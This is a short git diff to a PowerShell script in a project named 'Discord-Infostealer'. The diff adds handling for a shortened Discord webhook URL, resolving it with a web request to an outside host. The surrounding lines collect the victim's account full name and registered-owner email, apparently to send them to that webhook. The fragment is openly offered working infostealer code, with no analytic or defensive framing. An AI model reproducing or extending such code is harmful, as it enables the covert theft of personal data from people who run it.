diff --git a/Discord-Infostealer/main.ps1 b/Discord-Infostealer/main.ps1 index 23c6de2..8478285 100644 --- a/Discord-Infostealer/main.ps1 +++ b/Discord-Infostealer/main.ps1 @@ -1,4 +1,6 @@ $hookurl = "$dc" +# shortened URL Detection +if ($hookurl.Ln -ne 121){Write-Host "Shortened Webhook URL Detected.." ; $hookurl = (irm $hookurl).url} $userInfo = Get-WmiObject -Class Win32_UserAccount ;$fullName = $($userInfo.FullName) ;$fullName = ("$fullName").TrimStart("") $email = (Get-ComputerInfo).WindowsRegisteredOwner